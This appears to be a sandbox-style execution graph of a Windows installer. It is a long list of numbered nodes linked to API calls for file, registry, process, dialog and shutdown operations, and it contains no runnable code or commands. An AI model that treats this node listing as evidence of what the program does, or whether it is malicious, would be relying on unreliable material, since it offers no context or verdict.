                                                                                                                                                                                                                                                                        execution_graph 4341 402fc0 4342 401446 18 API calls 4341->4342 4343 402fc7 4342->4343 4344 403017 4343->4344 4345 40300a 4343->4345 4348 401a13 4343->4348 4346 406805 18 API calls 4344->4346 4347 401446 18 API calls 4345->4347 4346->4348 4347->4348 4349 4023c1 4350 40145c 18 API calls 4349->4350 4351 4023c8 4350->4351 4354 40726a 4351->4354 4357 406ed2 CreateFileW 4354->4357 4358 406f04 4357->4358 4359 406f1e ReadFile 4357->4359 4360 4062a3 11 API calls 4358->4360 4361 4023d6 4359->4361 4364 406f84 4359->4364 4360->4361 4362 4071e3 CloseHandle 4362->4361 4363 406f9b ReadFile lstrcpynA lstrcmpA 4363->4364 4365 406fe2 SetFilePointer ReadFile 4363->4365 4364->4361 4364->4362 4364->4363 4368 406fdd 4364->4368 4365->4362 4366 4070a8 ReadFile 4365->4366 4367 407138 4366->4367 4367->4366 4367->4368 4369 40715f SetFilePointer GlobalAlloc ReadFile 4367->4369 4368->4362 4370 4071a3 4369->4370 4371 4071bf lstrcpynW GlobalFree 4369->4371 4370->4370 4370->4371 4371->4362 4372 401cc3 4373 40145c 18 API calls 4372->4373 4374 401cca lstrlenW 4373->4374 4375 4030dc 4374->4375 4376 4030e3 4375->4376 4378 405f51 wsprintfW 4375->4378 4378->4376 4393 401c46 4394 40145c 18 API calls 4393->4394 4395 401c4c 4394->4395 4396 4062a3 11 API calls 4395->4396 4397 401c59 4396->4397 4398 406c9b 81 API calls 4397->4398 4399 401c64 4398->4399 4400 403049 4401 401446 18 API calls 4400->4401 4404 403050 4401->4404 4402 406805 18 API calls 4403 401a13 4402->4403 4404->4402 4404->4403 4405 40204a 4406 401446 18 API calls 4405->4406 4407 402051 IsWindow 4406->4407 4408 4018d3 4407->4408 4409 40324c 4410 403277 4409->4410 4411 40325e SetTimer 4409->4411 4412 4032cc 4410->4412 4413 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4410->4413 4411->4410 4413->4412 4414 4048cc 4415 4048f1 4414->4415 4416 4048da 4414->4416 4418 4048ff IsWindowVisible 4415->4418 4422 404916 4415->4422 4417 4048e0 4416->4417 4432 40495a 4416->4432 4419 403daf SendMessageW 4417->4419 4421 40490c 4418->4421 4418->4432 4423 4048ea 4419->4423 4420 404960 CallWindowProcW 4420->4423 4433 40484e SendMessageW 4421->4433 4422->4420 4438 406009 lstrcpynW 4422->4438 4426 404945 4439 405f51 wsprintfW 4426->4439 4428 40494c 4429 40141d 80 API calls 4428->4429 4430 404953 4429->4430 4440 406009 lstrcpynW 4430->4440 4432->4420 4434 404871 GetMessagePos ScreenToClient SendMessageW 4433->4434 4435 4048ab SendMessageW 4433->4435 4436 4048a3 4434->4436 4437 4048a8 4434->4437 4435->4436 4436->4422 4437->4435 4438->4426 4439->4428 4440->4432 4441 4022cc 4442 40145c 18 API calls 4441->4442 4443 4022d3 4442->4443 4444 4062d5 2 API calls 4443->4444 4445 4022d9 4444->4445 4446 4022e8 4445->4446 4450 405f51 wsprintfW 4445->4450 4449 4030e3 4446->4449 4451 405f51 wsprintfW 4446->4451 4450->4446 4451->4449 4221 4050cd 4222 405295 4221->4222 4223 4050ee GetDlgItem GetDlgItem GetDlgItem 4221->4223 4224 4052c6 4222->4224 4225 40529e GetDlgItem CreateThread CloseHandle 4222->4225 4270 403d98 SendMessageW 4223->4270 4227 4052f4 4224->4227 4229 4052e0 ShowWindow ShowWindow 4224->4229 4230 405316 4224->4230 4225->4224 4273 405047 83 API calls 4225->4273 4231 405352 4227->4231 4233 405305 4227->4233 4234 40532b ShowWindow 4227->4234 4228 405162 4241 406805 18 API calls 4228->4241 4272 403d98 SendMessageW 4229->4272 4235 403dca 8 API calls 4230->4235 4231->4230 4236 40535d SendMessageW 4231->4236 4237 403d18 SendMessageW 4233->4237 4239 40534b 4234->4239 4240 40533d 4234->4240 4238 40528e 4235->4238 4236->4238 4243 405376 CreatePopupMenu 4236->4243 4237->4230 4242 403d18 SendMessageW 4239->4242 4244 404f72 25 API calls 4240->4244 4245 405181 4241->4245 4242->4231 4246 406805 18 API calls 4243->4246 4244->4239 4247 4062a3 11 API calls 4245->4247 4249 405386 AppendMenuW 4246->4249 4248 40518c GetClientRect GetSystemMetrics SendMessageW SendMessageW 4247->4248 4250 4051f3 4248->4250 4251 4051d7 SendMessageW SendMessageW 4248->4251 4252 405399 GetWindowRect 4249->4252 4253 4053ac 4249->4253 4254 405206 4250->4254 4255 4051f8 SendMessageW 4250->4255 4251->4250 4256 4053b3 TrackPopupMenu 4252->4256 4253->4256 4257 403d3f 19 API calls 4254->4257 4255->4254 4256->4238 4258 4053d1 4256->4258 4259 405216 4257->4259 4260 4053ed SendMessageW 4258->4260 4261 405253 GetDlgItem SendMessageW 4259->4261 4262 40521f ShowWindow 4259->4262 4260->4260 4263 40540a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4260->4263 4261->4238 4266 405276 SendMessageW SendMessageW 4261->4266 4264 405242 4262->4264 4265 405235 ShowWindow 4262->4265 4267 40542f SendMessageW 4263->4267 4271 403d98 SendMessageW 4264->4271 4265->4264 4266->4238 4267->4267 4268 40545a GlobalUnlock SetClipboardData CloseClipboard 4267->4268 4268->4238 4270->4228 4271->4261 4272->4227 4452 4030cf 4453 40145c 18 API calls 4452->4453 4454 4030d6 4453->4454 4456 4030dc 4454->4456 4459 4063ac GlobalAlloc lstrlenW 4454->4459 4457 4030e3 4456->4457 4486 405f51 wsprintfW 4456->4486 4460 4063e2 4459->4460 4461 406434 4459->4461 4462 40640f GetVersionExW 4460->4462 4487 40602b CharUpperW 4460->4487 4461->4456 4462->4461 4463 40643e 4462->4463 4464 406464 LoadLibraryA 4463->4464 4465 40644d 4463->4465 4464->4461 4468 406482 GetProcAddress GetProcAddress GetProcAddress 4464->4468 4465->4461 4467 406585 GlobalFree 4465->4467 4469 40659b LoadLibraryA 4467->4469 4470 4066dd FreeLibrary 4467->4470 4473 4064aa 4468->4473 4476 4065f5 4468->4476 4469->4461 4472 4065b5 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4469->4472 4470->4461 4471 406651 FreeLibrary 4480 40662a 4471->4480 4472->4476 4474 4064ce FreeLibrary GlobalFree 4473->4474 4473->4476 4482 4064ea 4473->4482 4474->4461 4475 4066ea 4478 4066ef CloseHandle FreeLibrary 4475->4478 4476->4471 4476->4480 4477 4064fc lstrcpyW OpenProcess 4479 40654f CloseHandle CharUpperW lstrcmpW 4477->4479 4477->4482 4481 406704 CloseHandle 4478->4481 4479->4476 4479->4482 4480->4475 4483 406685 lstrcmpW 4480->4483 4484 4066b6 CloseHandle 4480->4484 4485 4066d4 CloseHandle 4480->4485 4481->4478 4482->4467 4482->4477 4482->4479 4483->4480 4483->4481 4484->4480 4485->4470 4486->4457 4487->4460 4488 407752 4492 407344 4488->4492 4489 407c6d 4490 4073c2 GlobalFree 4491 4073cb GlobalAlloc 4490->4491 4491->4489 4491->4492 4492->4489 4492->4490 4492->4491 4492->4492 4493 407443 GlobalAlloc 4492->4493 4494 40743a GlobalFree 4492->4494 4493->4489 4493->4492 4494->4493 4495 401dd3 4496 401446 18 API calls 4495->4496 4497 401dda 4496->4497 4498 401446 18 API calls 4497->4498 4499 4018d3 4498->4499 4507 402e55 4508 40145c 18 API calls 4507->4508 4509 402e63 4508->4509 4510 402e79 4509->4510 4511 40145c 18 API calls 4509->4511 4512 405e30 2 API calls 4510->4512 4511->4510 4513 402e7f 4512->4513 4537 405e50 GetFileAttributesW CreateFileW 4513->4537 4515 402e8c 4516 402f35 4515->4516 4517 402e98 GlobalAlloc 4515->4517 4520 4062a3 11 API calls 4516->4520 4518 402eb1 4517->4518 4519 402f2c CloseHandle 4517->4519 4538 403368 SetFilePointer 4518->4538 4519->4516 4522 402f45 4520->4522 4524 402f50 DeleteFileW 4522->4524 4525 402f63 4522->4525 4523 402eb7 4527 403336 ReadFile 4523->4527 4524->4525 4539 401435 4525->4539 4528 402ec0 GlobalAlloc 4527->4528 4529 402ed0 4528->4529 4530 402f04 WriteFile GlobalFree 4528->4530 4531 40337f 37 API calls 4529->4531 4532 40337f 37 API calls 4530->4532 4536 402edd 4531->4536 4533 402f29 4532->4533 4533->4519 4535 402efb GlobalFree 4535->4530 4536->4535 4537->4515 4538->4523 4540 404f72 25 API calls 4539->4540 4541 401443 4540->4541 4542 401cd5 4543 401446 18 API calls 4542->4543 4544 401cdd 4543->4544 4545 401446 18 API calls 4544->4545 4546 401ce8 4545->4546 4547 40145c 18 API calls 4546->4547 4548 401cf1 4547->4548 4549 401d07 lstrlenW 4548->4549 4550 401d43 4548->4550 4551 401d11 4549->4551 4551->4550 4555 406009 lstrcpynW 4551->4555 4553 401d2c 4553->4550 4554 401d39 lstrlenW 4553->4554 4554->4550 4555->4553 4556 403cd6 4557 403ce1 4556->4557 4558 403ce5 4557->4558 4559 403ce8 GlobalAlloc 4557->4559 4559->4558 4560 402cd7 4561 401446 18 API calls 4560->4561 4564 402c64 4561->4564 4562 402d99 4563 402d17 ReadFile 4563->4564 4564->4560 4564->4562 4564->4563 4565 402dd8 4566 402ddf 4565->4566 4567 4030e3 4565->4567 4568 402de5 FindClose 4566->4568 4568->4567 4569 401d5c 4570 40145c 18 API calls 4569->4570 4571 401d63 4570->4571 4572 40145c 18 API calls 4571->4572 4573 401d6c 4572->4573 4574 401d73 lstrcmpiW 4573->4574 4575 401d86 lstrcmpW 4573->4575 4576 401d79 4574->4576 4575->4576 4577 401c99 4575->4577 4576->4575 4576->4577 4279 407c5f 4280 407344 4279->4280 4281 4073c2 GlobalFree 4280->4281 4282 4073cb GlobalAlloc 4280->4282 4283 407c6d 4280->4283 4284 407443 GlobalAlloc 4280->4284 4285 40743a GlobalFree 4280->4285 4281->4282 4282->4280 4282->4283 4284->4280 4284->4283 4285->4284 4578 404363 4579 404373 4578->4579 4580 40439c 4578->4580 4582 403d3f 19 API calls 4579->4582 4581 403dca 8 API calls 4580->4581 4583 4043a8 4581->4583 4584 404380 SetDlgItemTextW 4582->4584 4584->4580 4585 4027e3 4586 4027e9 4585->4586 4587 4027f2 4586->4587 4588 402836 4586->4588 4601 401553 4587->4601 4589 40145c 18 API calls 4588->4589 4591 40283d 4589->4591 4593 4062a3 11 API calls 4591->4593 4592 4027f9 4594 40145c 18 API calls 4592->4594 4599 401a13 4592->4599 4595 40284d 4593->4595 4596 40280a RegDeleteValueW 4594->4596 4605 40149d RegOpenKeyExW 4595->4605 4597 4062a3 11 API calls 4596->4597 4600 40282a RegCloseKey 4597->4600 4600->4599 4602 401563 4601->4602 4603 40145c 18 API calls 4602->4603 4604 401589 RegOpenKeyExW 4603->4604 4604->4592 4611 401515 4605->4611 4613 4014c9 4605->4613 4606 4014ef RegEnumKeyW 4607 401501 RegCloseKey 4606->4607 4606->4613 4608 4062fc 3 API calls 4607->4608 4610 401511 4608->4610 4609 401526 RegCloseKey 4609->4611 4610->4611 4614 401541 RegDeleteKeyW 4610->4614 4611->4599 4612 40149d 3 API calls 4612->4613 4613->4606 4613->4607 4613->4609 4613->4612 4614->4611 4615 403f64 4616 403f90 4615->4616 4617 403f74 4615->4617 4619 403fc3 4616->4619 4620 403f96 SHGetPathFromIDListW 4616->4620 4626 405c84 GetDlgItemTextW 4617->4626 4622 403fad SendMessageW 4620->4622 4623 403fa6 4620->4623 4621 403f81 SendMessageW 4621->4616 4622->4619 4624 40141d 80 API calls 4623->4624 4624->4622 4626->4621 4627 402ae4 4628 402aeb 4627->4628 4629 4030e3 4627->4629 4630 402af2 CloseHandle 4628->4630 4630->4629 4631 402065 4632 401446 18 API calls 4631->4632 4633 40206d 4632->4633 4634 401446 18 API calls 4633->4634 4635 402076 GetDlgItem 4634->4635 4636 4030dc 4635->4636 4637 4030e3 4636->4637 4639 405f51 wsprintfW 4636->4639 4639->4637 4640 402665 4641 40145c 18 API calls 4640->4641 4642 40266b 4641->4642 4643 40145c 18 API calls 4642->4643 4644 402674 4643->4644 4645 40145c 18 API calls 4644->4645 4646 40267d 4645->4646 4647 4062a3 11 API calls 4646->4647 4648 40268c 4647->4648 4649 4062d5 2 API calls 4648->4649 4650 402695 4649->4650 4651 4026a6 lstrlenW lstrlenW 4650->4651 4652 404f72 25 API calls 4650->4652 4655 4030e3 4650->4655 4653 404f72 25 API calls 4651->4653 4652->4650 4654 4026e8 SHFileOperationW 4653->4654 4654->4650 4654->4655 4663 401c69 4664 40145c 18 API calls 4663->4664 4665 401c70 4664->4665 4666 4062a3 11 API calls 4665->4666 4667 401c80 4666->4667 4668 405ca0 MessageBoxIndirectW 4667->4668 4669 401a13 4668->4669 4677 402f6e 4678 402f72 4677->4678 4679 402fae 4677->4679 4680 4062a3 11 API calls 4678->4680 4681 40145c 18 API calls 4679->4681 4682 402f7d 4680->4682 4687 402f9d 4681->4687 4683 4062a3 11 API calls 4682->4683 4684 402f90 4683->4684 4685 402fa2 4684->4685 4686 402f98 4684->4686 4689 4060e7 9 API calls 4685->4689 4688 403e74 5 API calls 4686->4688 4688->4687 4689->4687 4690 4023f0 4691 402403 4690->4691 4692 4024da 4690->4692 4693 40145c 18 API calls 4691->4693 4694 404f72 25 API calls 4692->4694 4695 40240a 4693->4695 4700 4024f1 4694->4700 4696 40145c 18 API calls 4695->4696 4697 402413 4696->4697 4698 402429 LoadLibraryExW 4697->4698 4699 40241b GetModuleHandleW 4697->4699 4701 40243e 4698->4701 4702 4024ce 4698->4702 4699->4698 4699->4701 4714 406365 GlobalAlloc WideCharToMultiByte 4701->4714 4703 404f72 25 API calls 4702->4703 4703->4692 4705 402449 4706 40248c 4705->4706 4707 40244f 4705->4707 4708 404f72 25 API calls 4706->4708 4710 401435 25 API calls 4707->4710 4712 40245f 4707->4712 4709 402496 4708->4709 4711 4062a3 11 API calls 4709->4711 4710->4712 4711->4712 4712->4700 4713 4024c0 FreeLibrary 4712->4713 4713->4700 4715 406390 GetProcAddress 4714->4715 4716 40639d GlobalFree 4714->4716 4715->4716 4716->4705 4717 402df3 4718 402dfa 4717->4718 4720 4019ec 4717->4720 4719 402e07 FindNextFileW 4718->4719 4719->4720 4721 402e16 4719->4721 4723 406009 lstrcpynW 4721->4723 4723->4720 4076 402175 4077 401446 18 API calls 4076->4077 4078 40217c 4077->4078 4079 401446 18 API calls 4078->4079 4080 402186 4079->4080 4081 4062a3 11 API calls 4080->4081 4085 402197 4080->4085 4081->4085 4082 4021aa EnableWindow 4084 4030e3 4082->4084 4083 40219f ShowWindow 4083->4084 4085->4082 4085->4083 4731 404077 4732 404081 4731->4732 4733 404084 lstrcpynW lstrlenW 4731->4733 4732->4733 4102 405479 4103 405491 4102->4103 4104 4055cd 4102->4104 4103->4104 4105 40549d 4103->4105 4106 40561e 4104->4106 4107 4055de GetDlgItem GetDlgItem 4104->4107 4108 4054a8 SetWindowPos 4105->4108 4109 4054bb 4105->4109 4111 405678 4106->4111 4119 40139d 80 API calls 4106->4119 4110 403d3f 19 API calls 4107->4110 4108->4109 4113 4054c0 ShowWindow 4109->4113 4114 4054d8 4109->4114 4115 405608 SetClassLongW 4110->4115 4112 403daf SendMessageW 4111->4112 4132 4055c8 4111->4132 4142 40568a 4112->4142 4113->4114 4116 4054e0 DestroyWindow 4114->4116 4117 4054fa 4114->4117 4118 40141d 80 API calls 4115->4118 4171 4058dc 4116->4171 4120 405510 4117->4120 4121 4054ff SetWindowLongW 4117->4121 4118->4106 4122 405650 4119->4122 4125 4055b9 4120->4125 4126 40551c GetDlgItem 4120->4126 4121->4132 4122->4111 4127 405654 SendMessageW 4122->4127 4123 40141d 80 API calls 4123->4142 4124 4058de DestroyWindow KiUserCallbackDispatcher 4124->4171 4181 403dca 4125->4181 4130 40554c 4126->4130 4131 40552f SendMessageW IsWindowEnabled 4126->4131 4127->4132 4129 40590d ShowWindow 4129->4132 4134 405559 4130->4134 4135 4055a0 SendMessageW 4130->4135 4136 40556c 4130->4136 4145 405551 4130->4145 4131->4130 4131->4132 4133 406805 18 API calls 4133->4142 4134->4135 4134->4145 4135->4125 4139 405574 4136->4139 4140 405589 4136->4140 4138 403d3f 19 API calls 4138->4142 4143 40141d 80 API calls 4139->4143 4144 40141d 80 API calls 4140->4144 4141 405587 4141->4125 4142->4123 4142->4124 4142->4132 4142->4133 4142->4138 4162 40581e DestroyWindow 4142->4162 4172 403d3f 4142->4172 4143->4145 4146 405590 4144->4146 4178 403d18 4145->4178 4146->4125 4146->4145 4148 405705 GetDlgItem 4149 405723 ShowWindow KiUserCallbackDispatcher 4148->4149 4150 40571a 4148->4150 4175 403d85 KiUserCallbackDispatcher 4149->4175 4150->4149 4152 40574d EnableWindow 4155 405761 4152->4155 4153 405766 GetSystemMenu EnableMenuItem SendMessageW 4154 405796 SendMessageW 4153->4154 4153->4155 4154->4155 4155->4153 4176 403d98 SendMessageW 4155->4176 4177 406009 lstrcpynW 4155->4177 4158 4057c4 lstrlenW 4159 406805 18 API calls 4158->4159 4160 4057da SetWindowTextW 4159->4160 4161 40139d 80 API calls 4160->4161 4161->4142 4163 405838 CreateDialogParamW 4162->4163 4162->4171 4164 40586b 4163->4164 4163->4171 4165 403d3f 19 API calls 4164->4165 4166 405876 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4165->4166 4167 40139d 80 API calls 4166->4167 4168 4058bc 4167->4168 4168->4132 4169 4058c4 ShowWindow 4168->4169 4170 403daf SendMessageW 4169->4170 4170->4171 4171->4129 4171->4132 4173 406805 18 API calls 4172->4173 4174 403d4a SetDlgItemTextW 4173->4174 4174->4148 4175->4152 4176->4155 4177->4158 4179 403d25 SendMessageW 4178->4179 4180 403d1f 4178->4180 4179->4141 4180->4179 4182 403ddf GetWindowLongW 4181->4182 4192 403e68 4181->4192 4183 403df0 4182->4183 4182->4192 4184 403e02 4183->4184 4185 403dff GetSysColor 4183->4185 4186 403e12 SetBkMode 4184->4186 4187 403e08 SetTextColor 4184->4187 4185->4184 4188 403e30 4186->4188 4189 403e2a GetSysColor 4186->4189 4187->4186 4190 403e41 4188->4190 4191 403e37 SetBkColor 4188->4191 4189->4188 4190->4192 4193 403e54 DeleteObject 4190->4193 4194 403e5b CreateBrushIndirect 4190->4194 4191->4190 4192->4132 4193->4194 4194->4192 4734 4020f9 GetDC GetDeviceCaps 4735 401446 18 API calls 4734->4735 4736 402116 MulDiv 4735->4736 4737 401446 18 API calls 4736->4737 4738 40212c 4737->4738 4739 406805 18 API calls 4738->4739 4740 402165 CreateFontIndirectW 4739->4740 4741 4030dc 4740->4741 4742 4030e3 4741->4742 4744 405f51 wsprintfW 4741->4744 4744->4742 4745 4024fb 4746 40145c 18 API calls 4745->4746 4747 402502 4746->4747 4748 40145c 18 API calls 4747->4748 4749 40250c 4748->4749 4750 40145c 18 API calls 4749->4750 4751 402515 4750->4751 4752 40145c 18 API calls 4751->4752 4753 40251f 4752->4753 4754 40145c 18 API calls 4753->4754 4755 402529 4754->4755 4756 40253d 4755->4756 4757 40145c 18 API calls 4755->4757 4758 4062a3 11 API calls 4756->4758 4757->4756 4759 40256a CoCreateInstance 4758->4759 4760 40258c 4759->4760 4761 40497c GetDlgItem GetDlgItem 4762 4049d2 7 API calls 4761->4762 4767 404bea 4761->4767 4763 404a76 DeleteObject 4762->4763 4764 404a6a SendMessageW 4762->4764 4765 404a81 4763->4765 4764->4763 4768 404ab8 4765->4768 4770 406805 18 API calls 4765->4770 4766 404ccf 4769 404d74 4766->4769 4774 404bdd 4766->4774 4779 404d1e SendMessageW 4766->4779 4767->4766 4777 40484e 5 API calls 4767->4777 4790 404c5a 4767->4790 4773 403d3f 19 API calls 4768->4773 4771 404d89 4769->4771 4772 404d7d SendMessageW 4769->4772 4776 404a9a SendMessageW SendMessageW 4770->4776 4781 404da2 4771->4781 4782 404d9b ImageList_Destroy 4771->4782 4792 404db2 4771->4792 4772->4771 4778 404acc 4773->4778 4780 403dca 8 API calls 4774->4780 4775 404cc1 SendMessageW 4775->4766 4776->4765 4777->4790 4783 403d3f 19 API calls 4778->4783 4779->4774 4785 404d33 SendMessageW 4779->4785 4786 404f6b 4780->4786 4787 404dab GlobalFree 4781->4787 4781->4792 4782->4781 4788 404add 4783->4788 4784 404f1c 4784->4774 4793 404f31 ShowWindow GetDlgItem ShowWindow 4784->4793 4789 404d46 4785->4789 4787->4792 4791 404baa GetWindowLongW SetWindowLongW 4788->4791 4800 404ba4 4788->4800 4803 404b39 SendMessageW 4788->4803 4804 404b67 SendMessageW 4788->4804 4805 404b7b SendMessageW 4788->4805 4799 404d57 SendMessageW 4789->4799 4790->4766 4790->4775 4794 404bc4 4791->4794 4792->4784 4795 404de4 4792->4795 4798 40141d 80 API calls 4792->4798 4793->4774 4796 404be2 4794->4796 4797 404bca ShowWindow 4794->4797 4808 404e12 SendMessageW 4795->4808 4811 404e28 4795->4811 4813 403d98 SendMessageW 4796->4813 4812 403d98 SendMessageW 4797->4812 4798->4795 4799->4769 4800->4791 4800->4794 4803->4788 4804->4788 4805->4788 4806 404ef3 InvalidateRect 4806->4784 4807 404f09 4806->4807 4814 4043ad 4807->4814 4808->4811 4810 404ea1 SendMessageW SendMessageW 4810->4811 4811->4806 4811->4810 4812->4774 4813->4767 4815 4043cd 4814->4815 4816 406805 18 API calls 4815->4816 4817 40440d 4816->4817 4818 406805 18 API calls 4817->4818 4819 404418 4818->4819 4820 406805 18 API calls 4819->4820 4821 404428 lstrlenW wsprintfW SetDlgItemTextW 4820->4821 4821->4784 4822 4026fc 4823 401ee4 4822->4823 4825 402708 4822->4825 4823->4822 4824 406805 18 API calls 4823->4824 4824->4823 4274 4019fd 4275 40145c 18 API calls 4274->4275 4276 401a04 4275->4276 4277 405e7f 2 API calls 4276->4277 4278 401a0b 4277->4278 4826 4022fd 4827 40145c 18 API calls 4826->4827 4828 402304 GetFileVersionInfoSizeW 4827->4828 4829 40232b GlobalAlloc 4828->4829 4833 4030e3 4828->4833 4830 40233f GetFileVersionInfoW 4829->4830 4829->4833 4831 402350 VerQueryValueW 4830->4831 4832 402381 GlobalFree 4830->4832 4831->4832 4835 402369 4831->4835 4832->4833 4839 405f51 wsprintfW 4835->4839 4837 402375 4840 405f51 wsprintfW 4837->4840 4839->4837 4840->4832 4841 402afd 4842 40145c 18 API calls 4841->4842 4843 402b04 4842->4843 4848 405e50 GetFileAttributesW CreateFileW 4843->4848 4845 402b10 4846 4030e3 4845->4846 4849 405f51 wsprintfW 4845->4849 4848->4845 4849->4846 4850 4029ff 4851 401553 19 API calls 4850->4851 4852 402a09 4851->4852 4853 40145c 18 API calls 4852->4853 4854 402a12 4853->4854 4855 402a1f RegQueryValueExW 4854->4855 4857 401a13 4854->4857 4856 402a3f 4855->4856 4860 402a45 4855->4860 4856->4860 4861 405f51 wsprintfW 4856->4861 4859 4029e4 RegCloseKey 4859->4857 4860->4857 4860->4859 4861->4860 4862 401000 4863 401037 BeginPaint GetClientRect 4862->4863 4864 40100c DefWindowProcW 4862->4864 4866 4010fc 4863->4866 4867 401182 4864->4867 4868 401073 CreateBrushIndirect FillRect DeleteObject 4866->4868 4869 401105 4866->4869 4868->4866 4870 401170 EndPaint 4869->4870 4871 40110b CreateFontIndirectW 4869->4871 4870->4867 4871->4870 4872 40111b 6 API calls 4871->4872 4872->4870 4873 401f80 4874 401446 18 API calls 4873->4874 4875 401f88 4874->4875 4876 401446 18 API calls 4875->4876 4877 401f93 4876->4877 4878 401fa3 4877->4878 4879 40145c 18 API calls 4877->4879 4880 401fb3 4878->4880 4881 40145c 18 API calls 4878->4881 4879->4878 4882 402006 4880->4882 4883 401fbc 4880->4883 4881->4880 4885 40145c 18 API calls 4882->4885 4884 401446 18 API calls 4883->4884 4887 401fc4 4884->4887 4886 40200d 4885->4886 4888 40145c 18 API calls 4886->4888 4889 401446 18 API calls 4887->4889 4890 402016 FindWindowExW 4888->4890 4891 401fce 4889->4891 4895 402036 4890->4895 4892 401ff6 SendMessageW 4891->4892 4893 401fd8 SendMessageTimeoutW 4891->4893 4892->4895 4893->4895 4894 4030e3 4895->4894 4897 405f51 wsprintfW 4895->4897 4897->4894 4898 402880 4899 402884 4898->4899 4900 40145c 18 API calls 4899->4900 4901 4028a7 4900->4901 4902 40145c 18 API calls 4901->4902 4903 4028b1 4902->4903 4904 4028ba RegCreateKeyExW 4903->4904 4905 4028e8 4904->4905 4912 4029ef 4904->4912 4906 402934 4905->4906 4907 40145c 18 API calls 4905->4907 4908 402963 4906->4908 4911 401446 18 API calls 4906->4911 4910 4028fc lstrlenW 4907->4910 4909 4029ae RegSetValueExW 4908->4909 4913 40337f 37 API calls 4908->4913 4916 4029c6 RegCloseKey 4909->4916 4917 4029cb 4909->4917 4914 402918 4910->4914 4915 40292a 4910->4915 4918 402947 4911->4918 4919 40297b 4913->4919 4920 4062a3 11 API calls 4914->4920 4921 4062a3 11 API calls 4915->4921 4916->4912 4922 4062a3 11 API calls 4917->4922 4923 4062a3 11 API calls 4918->4923 4929 406224 4919->4929 4925 402922 4920->4925 4921->4906 4922->4916 4923->4908 4925->4909 4928 4062a3 11 API calls 4928->4925 4930 406247 4929->4930 4931 40628a 4930->4931 4932 40625c wsprintfW 4930->4932 4933 402991 4931->4933 4934 406293 lstrcatW 4931->4934 4932->4931 4932->4932 4933->4928 4934->4933 4935 402082 4936 401446 18 API calls 4935->4936 4937 402093 SetWindowLongW 4936->4937 4938 4030e3 4937->4938 3462 403883 #17 SetErrorMode OleInitialize 3536 4062fc GetModuleHandleA 3462->3536 3466 4038f1 GetCommandLineW 3541 406009 lstrcpynW 3466->3541 3468 403903 GetModuleHandleW 3469 40391b 3468->3469 3542 405d06 3469->3542 3472 4039d6 3473 4039f5 GetTempPathW 3472->3473 3546 4037cc 3473->3546 3475 403a0b 3476 403a33 DeleteFileW 3475->3476 3477 403a0f GetWindowsDirectoryW lstrcatW 3475->3477 3554 403587 GetTickCount GetModuleFileNameW 3476->3554 3479 4037cc 11 API calls 3477->3479 3478 405d06 CharNextW 3485 40393c 3478->3485 3481 403a2b 3479->3481 3481->3476 3483 403acc 3481->3483 3482 403a47 3482->3483 3486 403ab1 3482->3486 3487 405d06 CharNextW 3482->3487 3639 403859 3483->3639 3485->3472 3485->3478 3493 4039d8 3485->3493 3582 40592c 3486->3582 3499 403a5e 3487->3499 3490 403ac1 3667 4060e7 3490->3667 3491 403ae1 3646 405ca0 3491->3646 3492 403bce 3495 403c51 3492->3495 3497 4062fc 3 API calls 3492->3497 3650 406009 lstrcpynW 3493->3650 3501 403bdd 3497->3501 3502 403af7 lstrcatW lstrcmpiW 3499->3502 3503 403a89 3499->3503 3504 4062fc 3 API calls 3501->3504 3502->3483 3506 403b13 CreateDirectoryW SetCurrentDirectoryW 3502->3506 3651 40677e 3503->3651 3507 403be6 3504->3507 3509 403b36 3506->3509 3510 403b2b 3506->3510 3511 4062fc 3 API calls 3507->3511 3681 406009 lstrcpynW 3509->3681 3680 406009 lstrcpynW 3510->3680 3515 403bef 3511->3515 3514 403b44 3682 406009 lstrcpynW 3514->3682 3518 403c3d ExitWindowsEx 3515->3518 3523 403bfd GetCurrentProcess 3515->3523 3518->3495 3520 403c4a 3518->3520 3519 403aa6 3666 406009 lstrcpynW 3519->3666 3709 40141d 3520->3709 3526 403c0d 3523->3526 3526->3518 3527 403b79 CopyFileW 3529 403b53 3527->3529 3528 403bc2 3530 406c68 42 API calls 3528->3530 3529->3528 3533 406805 18 API calls 3529->3533 3535 403bad CloseHandle 3529->3535 3683 406805 3529->3683 3701 406c68 3529->3701 3706 405c3f CreateProcessW 3529->3706 3532 403bc9 3530->3532 3532->3483 3533->3529 3535->3529 3537 406314 LoadLibraryA 3536->3537 3538 40631f GetProcAddress 3536->3538 3537->3538 3539 4038c6 SHGetFileInfoW 3537->3539 3538->3539 3540 406009 lstrcpynW 3539->3540 3540->3466 3541->3468 3543 405d0c 3542->3543 3544 40392a CharNextW 3543->3544 3545 405d13 CharNextW 3543->3545 3544->3485 3545->3543 3712 406038 3546->3712 3548 4037e2 3548->3475 3549 4037d8 3549->3548 3721 406722 lstrlenW CharPrevW 3549->3721 3728 405e50 GetFileAttributesW CreateFileW 3554->3728 3556 4035c7 3577 4035d7 3556->3577 3729 406009 lstrcpynW 3556->3729 3558 4035ed 3730 406751 lstrlenW 3558->3730 3562 4035fe GetFileSize 3563 4036fa 3562->3563 3576 403615 3562->3576 3737 4032d2 3563->3737 3565 403703 3567 40373f GlobalAlloc 3565->3567 3565->3577 3771 403368 SetFilePointer 3565->3771 3748 403368 SetFilePointer 3567->3748 3569 4037bd 3573 4032d2 6 API calls 3569->3573 3571 40375a 3749 40337f 3571->3749 3572 403720 3575 403336 ReadFile 3572->3575 3573->3577 3578 40372b 3575->3578 3576->3563 3576->3569 3576->3577 3579 4032d2 6 API calls 3576->3579 3735 403336 ReadFile 3576->3735 3577->3482 3578->3567 3578->3577 3579->3576 3580 403766 3580->3577 3580->3580 3581 403794 SetFilePointer 3580->3581 3581->3577 3583 4062fc 3 API calls 3582->3583 3584 405940 3583->3584 3585 405946 3584->3585 3586 405958 3584->3586 3812 405f51 wsprintfW 3585->3812 3813 405ed3 RegOpenKeyExW 3586->3813 3590 4059a8 lstrcatW 3592 405956 3590->3592 3591 405ed3 3 API calls 3591->3590 3795 403e95 3592->3795 3595 40677e 18 API calls 3596 4059da 3595->3596 3597 405a70 3596->3597 3599 405ed3 3 API calls 3596->3599 3598 40677e 18 API calls 3597->3598 3600 405a76 3598->3600 3601 405a0c 3599->3601 3602 405a86 3600->3602 3603 406805 18 API calls 3600->3603 3601->3597 3607 405a2f lstrlenW 3601->3607 3613 405d06 CharNextW 3601->3613 3604 405aa6 LoadImageW 3602->3604 3819 403e74 3602->3819 